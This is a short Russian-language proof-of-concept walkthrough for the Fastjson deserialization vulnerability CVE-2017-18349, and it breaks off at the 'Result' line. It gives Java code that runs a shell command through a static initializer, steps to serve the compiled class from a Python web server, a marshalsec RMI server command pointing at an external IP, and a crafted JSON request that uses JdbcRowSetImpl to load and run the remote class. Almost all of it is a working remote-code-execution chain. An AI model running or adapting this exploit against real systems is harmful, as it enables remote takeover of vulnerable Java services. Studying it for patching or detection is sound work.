
Proof-of-concept эксплойт для уязвимости десериализации Fastjson CVE-2017-18349, демонстрирующий удаленное выполнение кода через специально сформированную JSON-нагрузку и RMI-сервер.
Настройте проект как Maven-проект и выполните (обратите внимание: использование более новой версии JDK может привести к ошибке, рекомендуется использовать JDK версии 1.8.65) функцию main в файле FastjsondemoApplication.java. Файл TouchFile.java:
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/flag_test"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
Затем скомпилируйте его с помощью javac версии 8:
javac TouchFile.java
Запустите веб-сервер на Python:
python -m SimpleHTTPServer 80
Сгенерируйте RMI-сервер с помощью marshalsec:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://47.99.70.18/#TouchFile" 9999
Измените запрос:
POST / HTTP/1.1
Host: 127.0.0.1:8080
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://47.99.70.18:9999/TouchFile",
"autoCommit":true
}
}
Результат: 